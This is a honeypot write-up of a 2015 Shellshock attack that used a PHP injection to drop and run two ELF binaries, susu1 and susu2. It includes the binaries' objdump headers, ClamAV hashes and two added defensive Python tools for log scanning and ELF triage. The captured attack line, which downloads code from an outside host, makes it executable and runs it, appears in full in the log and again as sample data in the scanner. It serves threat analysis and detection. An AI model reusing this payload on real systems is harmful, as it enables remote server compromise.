Saturday, 18 April 2015

susu1 and susu2 ELF files via php injection

Today several code injection attempts hit my honeypot.

188.138.40.254 - - [18/Apr/2015:05:37:08 +0200] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.0" 404 523 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
The two files exist to cover whichever architecture the server has: susu1 is a 64-bit and susu2 a 32-bit x86 binary, and the injected script downloads, chmods and runs both.
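As an added example (not code from the original post), a small Python scanner that parses Apache combined-format log lines like the one above, flags a bash function definition `() {` in the Referer or User-Agent field (the Shellshock pattern), and extracts the download URLs plus a few dropper keywords for alerting. The first sample line is the one from the post; the second is a constructed benign line used as a control.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Apache "combined" log format. The referer and user-agent fields may contain
# \" escapes, which is exactly where the injected bash/PHP ends up.
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)

# A bash function definition at the start of a header value (Shellshock).
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')
URL_RE = re.compile(r'https?://[^\s"\'<>\\]+')
# Keywords taken from the dropper seen in the post; supporting indicators only.
INDICATORS = ("php -r", "file_put_contents", "sys_get_temp_dir", "chmod 777")


@dataclass
class Finding:
    host: str
    time: str
    request: str
    field_name: str                 # which header field carried the payload
    urls: List[str] = field(default_factory=list)
    indicators: List[str] = field(default_factory=list)


def unescape(value: str) -> str:
    """Undo the backslash escaping Apache applies to quotes inside quoted log fields."""
    return value.replace('\\"', '"').replace('\\\\', '\\')


def analyze_line(line: str) -> Optional[Finding]:
    """Return a Finding if the line carries a Shellshock-style payload, else None."""
    m = COMBINED_RE.match(line.rstrip("\n"))
    if not m:
        return None
    for name in ("referer", "agent"):
        raw = unescape(m.group(name))
        if not SHELLSHOCK_RE.search(raw):
            continue
        return Finding(
            host=m.group("host"),
            time=m.group("time"),
            request=m.group("request"),
            field_name=name,
            urls=URL_RE.findall(raw),
            indicators=[k for k in INDICATORS if k in raw],
        )
    return None


def scan(lines):
    """Run analyze_line over an iterable of log lines and keep the hits."""
    return [f for f in (analyze_line(l) for l in lines) if f]


# Sample input: the log line from the post, then a constructed benign request.
SAMPLE_LOG = [
    r'''188.138.40.254 - - [18/Apr/2015:05:37:08 +0200] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.0" 404 523 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"''',
    '10.0.0.5 - - [18/Apr/2015:05:40:00 +0200] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f.host, f.time, f.field_name, f.urls, f.indicators)
```

The URL list is what you would feed to a blocklist or a sandbox fetch; the host and timestamp give you the count-per-source view the post ends with.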

susu1:     file format elf64-x86-64
susu1
architecture: i386:x86-64, flags 0x00000102:
EXEC_P, D_PAGED
start address 0x0000000000103cc0

Program Header:
    LOAD off    0x0000000000000000 vaddr 0x0000000000100000 paddr 0x0000000000100000 align 2**20
         filesz 0x0000000000004494 memsz 0x0000000000004494 flags r-x
    LOAD off    0x0000000000009be0 vaddr 0x0000000000509be0 paddr 0x0000000000509be0 align 2**20
         filesz 0x0000000000000000 memsz 0x0000000000000000 flags rw-

Sections:
Idx Name          Size      VMA               LMA               File off  Algn
SYMBOL TABLE:
no symbols
and

susu2:     file format elf32-i386
susu2
architecture: i386, flags 0x00000102:
EXEC_P, D_PAGED
start address 0x00c03e50

Program Header:
    LOAD off    0x00000000 vaddr 0x00c01000 paddr 0x00c01000 align 2**12
         filesz 0x00003631 memsz 0x00003631 flags r-x
    LOAD off    0x00000d30 vaddr 0x0804fd30 paddr 0x0804fd30 align 2**12
         filesz 0x00000000 memsz 0x00000000 flags rw-

Sections:
Idx Name          Size      VMA       LMA       File off  Algn
SYMBOL TABLE:
no symbols

ClamAV hashes (MD5 and SHA256, in hash:size:name form)
  • 5bc85adb6368be6a5321238377802ffd:18248:susu1
  • 381ea0197f00afe0d8e26bb48b71254b:14492:susu2
  • 5e3b5056f9be5490a4332c1cc429b7d2ab12385909586bf297d145ff7d5a34af:14492:susu2
  • 3a4f90405832615a5dbe59c64e6de50c2a1a3e9b372a8605daf60960d4bef016:18248:susu1
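As an added example (not code from the post), a Python triage helper covering the two steps above: it reads only the ELF identification bytes and fixed header to report what objdump's first lines show (32- vs 64-bit, endianness, machine, entry point), and it emits ClamAV hash records in the hash:size:name form listed here. The two inputs are constructed bare ELF headers (hypothetical, not the real susu1/susu2 files), so their hashes are not the ones above; the names "susu1-like" and "susu2-like" are placeholders.

```python
import hashlib
import struct
from dataclasses import dataclass

ELF_MAGIC = b"\x7fELF"
EI_CLASS, EI_DATA = 4, 5
ELFCLASS32, ELFCLASS64 = 1, 2
ELFDATA2LSB, ELFDATA2MSB = 1, 2
ET_EXEC = 2
# e_machine values from the ELF specification; enough for the samples discussed.
MACHINES = {3: "i386", 62: "x86-64", 40: "arm", 183: "aarch64", 8: "mips"}


@dataclass
class ElfInfo:
    bits: int        # 32 or 64
    endian: str      # "little" or "big"
    e_type: int
    machine: str
    entry: int


def parse_elf_header(data: bytes) -> ElfInfo:
    """Read e_ident and the fixed ELF header only; no sections or symbols needed."""
    if data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    cls = data[EI_CLASS]
    endian = {ELFDATA2LSB: "<", ELFDATA2MSB: ">"}[data[EI_DATA]]
    if cls == ELFCLASS64:
        fmt, size = endian + "HHIQQQIHHHHHH", 64
    elif cls == ELFCLASS32:
        fmt, size = endian + "HHIIIIIHHHHHH", 52
    else:
        raise ValueError("unknown EI_CLASS %d" % cls)
    if len(data) < size:
        raise ValueError("truncated ELF header")
    e_type, e_machine, _version, e_entry = struct.unpack(fmt, data[16:size])[:4]
    return ElfInfo(
        bits=64 if cls == ELFCLASS64 else 32,
        endian="little" if endian == "<" else "big",
        e_type=e_type,
        machine=MACHINES.get(e_machine, "unknown(%d)" % e_machine),
        entry=e_entry,
    )


def clamav_hash_lines(name: str, data: bytes):
    """ClamAV-style hash records: hash:size:signature-name, one MD5 and one SHA256."""
    return [
        "%s:%d:%s" % (hashlib.md5(data).hexdigest(), len(data), name),
        "%s:%d:%s" % (hashlib.sha256(data).hexdigest(), len(data), name),
    ]


def build_stub(bits: int, machine: int, entry: int) -> bytes:
    """Constructed sample: a bare ELF header (not a runnable program), for testing only."""
    cls = ELFCLASS64 if bits == 64 else ELFCLASS32
    ident = ELF_MAGIC + bytes([cls, ELFDATA2LSB, 1, 0, 0]) + b"\0" * 7
    if bits == 64:
        rest = struct.pack("<HHIQQQIHHHHHH", ET_EXEC, machine, 1, entry, 64, 0, 0, 64, 56, 0, 64, 0, 0)
    else:
        rest = struct.pack("<HHIIIIIHHHHHH", ET_EXEC, machine, 1, entry, 52, 0, 0, 52, 32, 0, 40, 0, 0)
    return ident + rest


# Hypothetical stand-ins with the class, machine and entry points objdump reported.
SAMPLES = {
    "susu1-like": build_stub(64, 62, 0x103CC0),
    "susu2-like": build_stub(32, 3, 0xC03E50),
}


def triage(samples=SAMPLES):
    """Return {name: (ElfInfo, [hash lines])} so each dropped file can be routed by arch."""
    return {name: (parse_elf_header(blob), clamav_hash_lines(name, blob))
            for name, blob in samples.items()}


if __name__ == "__main__":
    for name, (info, sigs) in triage().items():
        print(name, info)
        for line in sigs:
            print("  ", line)
```

Because only the first 64 bytes are read, the same check works on a quarantined upload before anything else is done with it, and the hash lines drop straight into a local .hdb/.hsb file.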
I saw 56 attempts coming from the same source, 188.138.40.254; the origin country is Germany.